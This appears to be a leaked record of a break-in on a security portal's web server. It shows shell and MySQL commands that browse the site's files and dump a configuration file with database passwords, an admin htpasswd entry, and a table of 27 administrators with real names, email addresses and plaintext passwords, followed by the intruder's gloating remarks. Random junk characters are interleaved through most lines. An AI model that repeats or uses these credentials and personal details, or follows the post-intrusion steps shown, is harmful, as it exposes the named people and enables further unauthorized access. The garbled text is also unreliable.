! c2 l  S: f) S3 E3 ldrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
- Q; q1 F" M! X* Y" H& }drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth1 ?7 M0 f* T* y8 Q$ M1 z
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history1 a& h/ o8 {* u8 M  o
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout+ J, ?& Q& T  [# z9 \+ @4 ]& j0 V
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile3 C4 H. V8 U3 z
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc6 i* g0 h; o$ j  a8 s$ W( L1 C6 j
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
0 ?% q$ p/ P; C% p& hdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
, S8 a2 I2 E4 E6 L5 ]drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
9 ?& B4 \* @, vlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html' s. _: x( M2 @6 a0 R
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
$ C3 J& t# m% j% g
" C) |* E7 e: l9 A+ t( n9 Psh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
( w; L+ \- r! l( q# dsh-3.2$ ls -la0 X3 f1 S- T; D
total 200: h- M! R( i, X! Y( x- \" f
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
; a9 C3 m  ?+ e( P, pdrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
) w! J* N6 T) {8 p8 ~3 ~  Y$ `drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007$ i0 G. A4 W/ M) G
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql2 J* g7 j# k3 T4 |  p9 z% B
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com4 F2 U4 y4 B! o" O1 g
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
2 C' a+ r  k5 l' |8 Ydrwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner, _  e& ]3 u: G. P. z" a
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg, I( Q! f) ^0 l% v+ S5 ?; Y6 ?
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config+ |- E! c8 K6 j4 m# p
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
0 D& a+ E/ ~9 W; K! Edrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd6 [3 e; H7 T3 I- H
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
) Y: G+ I( |6 y-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico
% g3 q, e5 `! D. N3 Cdrwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
: g8 Z# c& l# m- ]. ?! L2 odrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
( ~8 e* H  T7 H) ]6 Q! b( u3 R-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess9 |2 z0 K5 `$ _( i4 |
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess# Y4 F' o) y+ H0 B- d. v
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
- V1 ~8 Y9 m( z  u8 C2 b& A- A3 ^-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html0 z' v8 Y1 o3 m) W
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
, T8 h6 z9 k1 q& k3 u-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php' K2 Z. d8 P, X+ |4 {
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf7 U" K9 X! G& E7 B7 D
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
1 r7 M( V% {8 F3 Z6 Y9 P, W1 Jdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang" X/ f2 c$ |1 M' d, ~
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib" m) M1 J# i! P* w5 L, F2 d/ W, t
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
- Q0 A  V3 e0 f# \drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
; \- T" y% q# F5 _: zdrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata3 E( B. z( A/ J$ y
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new" ^. a& A  y4 J, K+ F3 d
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf0 M( `& Q' q% L  C( k
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
  ?0 Y- l2 m' H. `-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt, G: `3 T% d3 x5 }/ w+ T: Y" x
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss0 t. ?' R# [  [) ?
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
' Q$ \  H/ x8 u0 m% f1 Tdrwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
. `, s$ |( |, ~+ R4 Q& H6 Jdrwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
0 j: j  P8 G7 p* Z* X4 t$ bdrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src/ B" {/ U0 R9 E( R) Z/ a7 T( w; \
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl2 t: X1 A# Q9 X5 b2 V
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
' D: C9 w5 \( D* D$ ~5 a/ n) R* fdrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old. C2 K% G. s& R5 z# O' U+ k6 p
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php! {& h4 B6 s3 \( f, E
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
2 |0 ~2 R: B" F% e& R5 a7 I( x: g+ W0 p; e6 x
sh-3.2$ head -20 index.php# u; L; W' a* ?7 H! p; v4 M6 b
<?PHP5 }3 l3 o$ w4 x- K4 H( f# L
/**
6 O6 ?/ ]1 O! o1 v/ m0 p- D) S* M* Mainfile (external) for astalavistaNET v2.0) f3 O( E2 L- ~0 v7 M$ @
*8 ~2 Z) G& P. y. r
* @copyright     Astalavista IT Engineering GmbH2 D3 [5 L$ G. u( t, j
* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>' f$ f$ B0 p  j, z0 ^; `
* @version       1.0
! a4 D0 j& j; ], G- R- Y*/
6 s9 v4 g3 `# x& \' t) {) G4 S8 x3 A& q
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {% Y1 X+ G! b/ S+ Q# w8 v6 Y% s
                $dontStartSession = false;$ o" K- k8 n+ u( C9 L# h; r
        } else {
+ |' e) u8 d5 Z5 |                $dontStartSession = true;! \( g" C1 K& H: i+ E  `+ Y
        }4 i) S4 {2 ?1 S1 R' `. l
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
0 |* v/ U: L4 Y  `. A# m        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
# Y$ T/ P# ?- V7 a        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);8 p2 r) J- G; Z+ c# n9 G
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
1 O2 E; w& q( F' K" H- C! w1 B& A: Y% C: P% h* E7 t+ H
sh-3.2$ cd config
  w6 }5 ?4 F6 w, osh-3.2$ ls -la. a: Q5 \1 n# W- v% l/ D
total 32
# ?/ E! l. L7 P- c  u* A( @. x6 Kdrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
) i: C7 i  u" t3 \& |& e% o& @drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..# d6 |! |4 \, J- \! L$ T; j. i
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
( f% _% z1 E/ A& [3 h6 H$ i- k-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
! W, `& s  Z1 i4 {, G: e; j-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
' `. {& }# D  F-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php2 l# I: x7 j. r" B" ?
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php& @2 h1 `* [# L+ k5 o
8 J! u6 x+ \! X5 [' \* n" z) v8 X" S
sh-3.2$ cat com.conf.php( D/ t, p9 c' H
[snip]
, O" x' ?, R. Q( m8 w$ t  B//member-database( \9 Z3 Q/ {/ r  e" f& v& W
$_CONFIG['db_mem_server']       = ‘localhost’;4 w: V* _1 D% Y) @5 x
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;. p& G& l$ G( a* ~# q
$_CONFIG['db_mem_user']         = ‘astanet_db’;9 f5 l+ g3 b, E0 T/ a( Q9 g
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
( p8 J- N( x$ \  w% k$_CONFIG['db_mem_debug']        = false; //true or false
7 S2 ?4 I3 b3 G0 y+ X% ^, U//ads-database
2 [: u: S" A2 `( x1 _$_CONFIG['db_ads_server']       = ‘localhost’;
8 r' H$ u3 Q# _/ f$_CONFIG['db_ads_database'] = ‘astanet_ads’;
/ W7 ]- p! v+ L$ ]/ G$_CONFIG['db_ads_user']         = ‘astanet_db’;
+ o! ^( J: B9 P% l. Z6 c; k; A$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
6 Y; h/ z% L. Z$_CONFIG['db_ads_debug']        = false; //true or false6 a/ ~! x1 P9 F5 I& {
//rainbow-database* r# N# Z* X: c) L% I2 Y
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
7 B/ H( K" [6 S, S* B* a9 W  Y2 k$_CONFIG['db_rainbow_database'] = ‘rainbow’;
& c! l$ V4 H$ C4 I3 P$_CONFIG['db_rainbow_user']     = ‘dinu’;4 D3 s; g1 x( j4 z' U/ I3 f6 r
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
( w2 d" Z2 v+ z7 E' ]- U$_CONFIG['db_rainbow_debug']    = false; //true or false
. v8 r) k8 h: B' J//mailing lists database
' G$ n1 G* l5 d( O$_CONFIG['db_mailing_lists_server']     = ‘localhost’;" s7 N+ K3 E4 ]
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
* n- O2 ^* x3 L% _5 N& l$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
+ Z" g7 x3 F& c' _$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;3 S# l8 Q+ }9 I" R, Q/ m, _% W+ S7 K
$_CONFIG['db_mailing_lists_debug']              = false; //true or false0 g+ ]+ S6 R1 L
//paypal( [2 R% g1 I0 ~/ T; S$ |4 {& U
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
; Z9 O4 K- _2 p/ s. y" Q0 H4 [$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
. [) J" V' P& O8 x' b$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
' J, ]1 o* ?3 ~1 M! h& I( C& d$_CONFIG['sub_pp_noship']       = ‘1′;
- i# \% P! I( C9 F/ n9 q$ I$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
0 Y5 \& W$ E! q! ^# Q+ c[snip]9 \! Z( a' g* l/ e+ ~, D5 W2 G- v

# A+ P4 }8 C  R( G9 `# Ush-3.2$ cd ..1 D; F" z1 j6 K& V: v& T1 N
sh-3.2$ cd member
* l* ~9 b% W7 \. `sh-3.2$ ls -la
* P* Z, k4 ?8 f; Rtotal 20
6 M) w3 D) K/ Z" ?9 }- p, z1 Y. Odrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
6 \$ }' U: |$ e4 x0 x; W* t3 q( `. tdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..! l5 [1 w% H; y4 Q! ?1 c
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess+ a3 G* U5 ^! K3 w" `
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
) B2 m3 Q% Q+ \, @2 |2 t+ Wsh-3.2$ cat .htaccess
& z5 k1 e' ~8 a3 VSecFilterEngine off
6 `! o( V% u" e. b% i5 E2 u: _  D" @: N% X: u
sh-3.2$ cd ..* O0 u/ a0 w6 J% F# H% t8 c1 ^
sh-3.2$ cd cron, ?; {' F# C( c- r
sh-3.2$ ls -la
1 @! [+ b% T6 Y  @6 E/ p/ Rtotal 168
2 u0 b% r1 S' p# V7 T' E0 Qdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .7 w4 _0 m! _+ z7 G8 x" K
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..1 h8 G( R5 w- V3 e2 a7 S+ n4 S
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
9 N# J# M+ T2 i: H-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php! b/ [2 d: f- }# A0 ]4 M
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php. m5 {- M$ P/ D6 ?& d
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
% ]3 _* m- f) ~4 |  U9 \-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
, @+ X! W  B, P6 N+ H7 D-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php! {& t* l( \; H; z+ w
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
# q: R- Z. V3 ^2 W-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php9 X2 P2 q% H) ^  q
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
$ h- X' P. T9 x; [-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
- x) C# K4 a# h% `! f5 s-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
/ T% l1 L  K( f! k( S' f/ @-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
2 G; W( w% c: k0 n6 m1 e-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
0 l, l$ _+ x; g  D' F-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
4 [& s0 l: x0 Y0 N4 a/ E  e-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
3 [! p$ [) s6 Y6 f# j-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
! D) {# r' w9 S0 M/ _! e-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php/ W9 v9 C8 O+ e2 a) z) S9 v
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php2 L) y: I" |! q" k7 R  f: {
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
) T# J9 f7 M/ p+ q; r3 j% U-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
7 b9 |! a# J- @7 A0 \' D& [-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php3 h' E9 ?5 r; e. m8 ?& C+ b

0 x5 M" M- o7 U8 ssh-3.2$ cd ..
! A. f9 k/ ^; g& C) [: ssh-3.2$ cd _007
* I: y; q2 `: E4 B% X' d8 q8 C1 q/ Fsh-3.2$ ls -la
- a4 b- K/ \8 }8 Wtotal 246 o0 l; a( N# T- j) o) Q, y5 ?
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
1 n2 t( Y, i5 a" K/ _: Kdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ... H; ?* U# B  ~9 d/ X) J
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess8 _! `; s" F  k* C- o5 b
-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
; e7 W9 Q3 U3 k* d" w-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php1 U& l3 j8 e8 R9 v4 \3 W
drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
0 R/ `: L* j. ~3 b2 B( F
  b2 A5 z9 c- U2 ~sh-3.2$ cat  .htaccess, z. E( [1 x0 b  G
authType Basic
  k. @3 ^9 @; `  B) G6 ?# _: p/ L" GauthName Admin
+ q8 a; O7 V' ~2 ZauthUserFile /home/astanet/auth/.htadm_pwd
4 w6 o) A4 w: k( Srequire valid-user% x! {% m, a. i6 w. @9 T5 r

7 e: c8 W- Q/ j& C9 Z) K6 bsh-3.2$ cat /home/astanet/auth/.htadm_pwd
3 u4 i! L6 I3 j5 hadmin2net:CR0bl65MwhfT, e+ Q! ~+ v* h
4 ]7 E5 b: j, j- j) _
sh-3.2$ mysql -u astanet_db -p
: Z3 i$ w/ ^9 x6 ?2 I& LEnter password:. V4 a/ n% c1 K' w! W! M$ L! _
Welcome to the MySQL monitor.  Commands end with ; or \g.
# I* ~' n0 Q/ _1 FYour MySQL connection id is 275153. p3 g& G" q& n" Y9 `; k2 B
Server version: 5.0.45-community-log MySQL Community Edition (GPL)# O0 i2 H0 B3 R
# H8 [0 C/ @; m" D5 f9 ^& i; ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( @4 [( i* H9 ]" K* x# w
6 R" ]* [) S( U/ Z
mysql> show databases;0 E  n/ D% Y. v0 g/ w3 k
+———————–+. B4 w  w( U0 C/ {" c/ ]
| Database              |+ h) \' L6 t) f0 b( I
+———————–+
5 O. C5 c9 r; r8 N7 \| information_schema    |. K: X* Q4 ~! m8 B' K" X+ _' C1 D
| astanet_ads           |
( _( H$ V" P* h7 i| astanet_mailing_lists |# [5 K3 L" ^% v- w. b
| astanet_mediawiki     |
& z5 v7 C7 X! m/ k+ l| astanet_membersystem  |
8 N+ B7 O& K3 k6 }, l0 X3 P5 N| test                  |
+ q* F0 A4 w' s! ?) X: @9 b: G2 v( i+———————–+
/ v8 `+ [' G$ R- U- c1 d6 rows in set (0.00 sec)
1 P6 v4 V1 C. {( H4 H
. n! r- U8 `+ g( vmysql> use astanet_membersystem
: Y6 c8 n9 t. n7 T, a' ZDatabase changed8 a' i; b1 O0 O8 V/ Y& B: M2 h
mysql> show tables;4 }3 C: Y  R1 D5 K8 B
+———————————–+
8 o9 I: N2 T6 k! d9 |8 m3 @# P, z| Tables_in_astanet_membersystem    |
/ x/ T( Q' m% }/ v+———————————–+
( \; R; }& P( E! n| blacklist_categories              |
0 R- U: z' H2 Q+ e) K; ]| blacklist_content                 |: P7 X+ n, n  c* @3 r8 O
| blacklist_levels                  |
/ d; \& b- o! c2 B! r| blacklist_mcset                   |: q1 I  O$ ?) t
| dir_categories                    |7 s4 T4 X  b# r5 k! {8 J
| dir_comments                      |
' I" m+ R: {3 Z1 q| dir_links                         |4 s. ~+ @0 @7 E+ S5 E# R1 c
| dir_temp                          |
: V) Q8 ~) V5 \| dir_votes                         |6 E5 y: }" ]9 E& Y1 E
| documents                         |. |' [& f. |& ?
| documents_categories              |
  |! z4 L* i- e* n9 o! d| email_content                     |
5 v% Z# t5 C+ y0 x4 G7 U- x+ A8 [| email_settings                    |
9 t8 K1 a$ `3 a& c- z  C* Q| exploits                          |% `8 x8 {  z! ?3 Y
| exploits_categories               |( Q( e7 r# q( [3 y' M
| exploittree_categories            |6 T8 y; d, S/ v/ X. W+ Q
| exploittree_exploits              |
- i# Y- j, y! P# Z| home_values                       |2 h& A7 n. K! n1 g6 D
| iso_countries                     |
: N) Q: P0 w2 K4 ]( Z| links_categories                  |4 d$ }' K) J4 j, F. c
| links_records                     |5 g3 v+ ^" r5 X9 d  d
| links_unauth                      |0 _/ J) \, t; D( y. |( Q  q& H8 Q
| links_votes                       |! J) S/ Y) D9 u0 _" Q" k: J
| log                               |
3 t* y* q) s6 k) ^3 N2 K+ }| news_categories                   |
. X4 m, S- k5 C" }( O| news_comments                     |
2 i' L* {9 W5 X| news_emoticons                    |! t! ]+ f: S3 g  |
| news_latest                       |7 `3 ]1 y6 l- A7 p5 I
| news_messages                     |
* q" d- i3 Q  g5 ]) ]| news_statistics                   |& b. S$ @; H2 I8 x
| news_votes                        |
) F- l+ |/ @& e$ z" r| prices_content                    |# g& C1 B' H. X& T) ~' I% L
| prices_offers                     |* \6 W1 o+ R! w- P0 s2 u1 R5 ?
| rss_settings                      |, m' Z3 D3 T# w
| sessions                          |9 G% J2 G4 }/ }+ u* C
| stats_signups                     |: X/ z% i% ]: Q; i) f7 I4 M- T& _
| u2u2                              |( W$ W/ t; ~3 b. j8 E$ L
| u2u_contact                       |
! Z  e6 k/ ^* ?7 J" P, c* v| u2u_settings                      |7 W6 A: y* c) |$ c, ~7 [
| user_keywords_selected_categories |. Q. \" k8 h1 H) ~# l5 x6 e: u
| users                             |
$ j, q+ ~& {( ~5 q% ]$ ~| users_ipn_test                    |
) h+ J( |& ?# ?( `! h| users_keyword_values              |
! p: r* d1 s3 D$ o2 H. b| users_profile                     |7 x& w6 G- d' X1 x, C9 \/ i
| users_temp                        |
, c# Z7 A6 N2 t0 r* ^# ?" m4 L$ @| users_upgrade                     |5 q. B0 v7 h0 Q
+———————————–+
; H  ^6 V- ]% W46 rows in set (0.00 sec)
7 M8 [  w2 ?$ Q5 |2 t3 F0 `2 |: J3 T/ I' R7 y/ |; t0 |) N
mysql> describe users;
2 P9 l) G/ ^! L+————————–+————————————–+——+—–+———————+—————-+
: O5 |' s2 ~2 N6 v+ Q9 E| Field                    | Type                                 | Null | Key | Default             | Extra          |- Y1 o1 X) ?0 ?( m% G9 o6 n( \
+————————–+————————————–+——+—–+———————+—————-+; w' T' q9 h3 x6 o
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
9 R8 f9 Y5 y" V; t| user                     | varchar(50)                          | NO   |     |                     |                |3 r4 w2 o, B5 i* D
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
* }& m; A  h- Y1 J! ]3 B| password                 | varchar(30)                          | NO   |     |                     |                |
3 M& N. A2 J# I0 K| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |& V: v7 _+ Q5 G0 e+ T- T
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |5 M8 S0 h1 F# f( @- y
| email                    | varchar(50)                          | NO   |     |                     |                |4 i0 P3 {% f/ M" k2 @/ c7 n
| ip                       | varchar(15)                          | NO   |     | 0                   |                |
& b  W) U: y: D! \# @  g| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
7 P: C/ `) l  || logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
! ~: Q/ w0 e, y& g5 G) y  Z| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
# g; M" \) R8 g4 W+ G| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
: |/ h9 e# C- I$ h' v+ g, |+ [| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
  @3 {# I) e- w0 h6 a" Q( M% v* w| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |0 @2 Y# s$ m  W  Q  @
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |3 X  V/ a" v0 P! h1 j
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
6 m5 D; r5 h4 g( z& U7 G| lang                     | tinytext                             | NO   |     |                     |                |4 k, N1 m% I' d5 E; z
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
+ a8 D* v5 t: S- ?! E( M| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |) D7 R- H6 y" C( L, i7 }  q0 Z! a" H3 I
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |  o7 F( k0 v1 S7 j# j2 ]
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
2 f6 l( W7 Y( z# q' X5 A8 U| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
, }! {) p; x6 q' B2 ^: O# c+————————–+————————————–+——+—–+———————+—————-+$ N, h  }& ]  @/ x. B  i( {* X  x0 B
22 rows in set (0.01 sec)
- _! }/ V4 Q$ j& U) i
: U' B9 r- H0 ~* h; c" }* W. L3 Smysql> select count(*) as skids from users;
7 R7 Z# C1 S! J+ x: U; A0 z+——-+
6 s6 {. w) w  j; |9 z; M; W| skids |
7 o0 w0 C& W& K# l4 {+——-+
8 P; D$ j' n4 v+ U. k| 25199 |9 G; y0 S6 H: Q
+——-+
3 {( U' Z, W( X* g8 q, N1 row in set (0.00 sec); C8 S; c1 m+ H2 f2 q

8 Q/ y* i; G& g* Cmysql> select user,nickname,password,email from users where userlevel = 1;% H) v0 A4 u5 L2 S: `3 R
+————————–+———————-+——————+———————————–+
* d- c3 ]7 p  B2 C* z| user                     | nickname             | password         | email                             |
- n0 ]" c, D. s/ D& k+————————–+———————-+——————+———————————–+
4 _- D7 x: A# |6 t/ S$ V& o9 U| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
' V7 @7 I! _2 }5 h| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
' y& j5 c3 V, c5 y| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |; F8 w1 L' ]5 P) [- S
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
/ P1 H! B' c% r" I| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
3 c4 a/ H: ?/ a% b. n! Z! p| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
# Z! f, }+ Y& N* u5 G| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |) y% O) D1 C2 X, @* S! d# {
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |* [& F+ X' s; ]; ^6 Q
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |# ?5 F8 l6 C1 g3 N) w
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
( L- e0 m; X- Q4 h) O/ D6 d: h1 s# @& B| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |: z$ e$ k2 x& \
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |4 e* ^2 M6 H. h1 G" w* F3 e6 M5 k2 c
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
, m2 t. Y( u7 e( _' q- _| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |6 B; D4 p5 D% K3 E& l1 P& U  Z3 X
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |2 r- n* _7 k3 w8 F
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
7 R4 v: _( o4 s2 o, K( M; f/ I| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
1 T6 M- U/ R2 H: U6 C| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |5 `' ?0 z0 K0 }6 G# a: z
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |
; [! @8 A4 p. t& K4 p" r* H( }4 H+ ^| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |0 m7 m3 G1 A1 t2 [/ Y
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
5 H. \6 ~# A, |; E; M| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
* `0 z! R; z2 V1 h1 G' n3 w| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |
! r- @* C* l& Z* x| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |7 h, n' U# b% k
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |# n  g) C$ M! c* D- Y
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |. {' J( w! s7 Z  ^' i& m# w
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
- v4 F  \! |7 _( T- `/ A6 n; g+————————–+———————-+——————+———————————–+
  Q6 V$ C$ N% s27 rows in set (0.00 sec)
" |# D) u. Y- X3 E" n6 R# D9 C' h/ @: u) k! y
mysql> exit;
6 W/ ?- O# X# X& Q4 TBye
* F% M  C7 d( a6 o9 O/ d$ n+ S# P7 _* x$ E) Y( [0 ]. ^
[~] plaintext passwords? yes,
9 Z  A/ @: Z' A$ x: LThose so called “security professionals” who charge you $6.66 / month to' [9 @; P0 d! k; _; l3 p
register at their hack-proof portal, save your passwords in plaintext…
4 U3 Q* k: M9 V6 z* u; v) jbrilliant!
4 W3 F) Q+ [; @" _. _& Y- ]" ]9 a: y( c& W
[~] This been fun but we want more.: U$ }9 }& B; d' H) A

